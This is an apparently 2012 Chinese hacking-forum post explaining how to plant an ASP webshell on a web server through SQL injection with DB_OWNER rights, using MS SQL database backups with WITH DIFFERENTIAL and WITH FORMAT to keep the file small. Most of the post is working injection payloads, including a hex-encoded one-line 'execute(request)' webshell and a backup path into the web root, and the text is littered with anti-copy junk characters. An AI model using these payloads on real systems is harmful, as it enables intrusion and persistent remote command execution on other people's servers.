中国网络渗透测试联盟
标题:
DB_OWNER权限得到webshell的改进办法
[打印本页]
作者:
admin
时间:
2012-11-9 21:31
标题:
DB_OWNER权限得到webshell的改进办法
DB_OWNER权限得到webshell的两点改进:
( D# s V0 ~; Z* U% p
( u$ X6 p6 N& ]! T4 m: z8 ?
减少备份文件大小,得到可执行的webshell成功率提高不少
# B x6 _# }% C, E% X8 H( |; y! Y; n* z
一利用差异备份
- q& W$ D6 K, r. I, H
加一个参数WITH DIFFERENTIAL
# Q0 p% a: r$ B6 S' r4 D7 K2 K. ~0 o
. D u; w) r2 Z9 N% C* F
1
8 i9 E0 u2 V, O
2
; u: x* V1 X3 x- R }
3
) t7 x- d' x) x
4
" Y0 D D5 A7 h4 {; D9 N1 X$ R; Z
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s
0 w0 Q- Z7 J- I ?; z
create table [dbo].[xiaolu] ([cmd] [image]);
# A# }2 w. T+ B2 s1 E" _
insert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)
4 x5 r% N" v& ?# [
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH DIFFERENTIAL
3 c; \( I& u' x
3 \! Y5 Q7 I: h
二利用完全FORMAT
! v# ^* X# U4 [$ a; T* b3 p
加一个参数WITH FROMAT
: A5 U( S1 ~7 @! Z$ p
有些页面对数据库要执行几次,而备份又默认是每次都以追加的方式,如果一个注入点对数据库有几次操作,而备份的文件就 几倍的增加,所以
: {% t/ b: n) o* |
1 q7 j7 i- a# \) Y% N6 W
1
" t' _3 l! F% D8 F& n
2
4 O( z9 h2 h1 w# m# E# i
3
+ K# U! x$ {+ Z( j: i: D1 x6 L7 S
4
$ X4 d' n& A* {; J9 L
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s
* l O2 i, W0 B0 Q
create table [dbo].[xiaolu] ([cmd] [image]);
, n7 W7 j5 ^2 `. j! l! Q
insert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)
. K. E( z/ h. l8 b e- R5 u
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH FORMAT
/ N2 N- {3 c# {2 V
9 Y/ I( r$ N! K
总的来说就是那么简单几句,下面以备份数据库model为例子
, [, G7 A1 S8 t! F3 Y9 a# f
1
( I- Q/ @) s. b8 k& r
- l6 v) Q1 t$ D$ l9 u
1
$ M# C% h1 a4 w& x
id=1;use model create table cmd(str image);insert into cmd(str) values ('<%25execute(request("a"))%25>')
+ Z) q( V' A1 k! g
, c* S7 ]: z6 J8 R( Y8 j
2
2 x# R* Q6 H2 N0 B. u' Z6 {
: p8 r9 c# [) ?9 y* X4 j
1
; R+ C5 G) t6 t2 C
id=1;backup database model to disk='你的路径‘ with differential,format;--
4 k/ h: Z: P+ T% @7 ?. L( o4 E
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2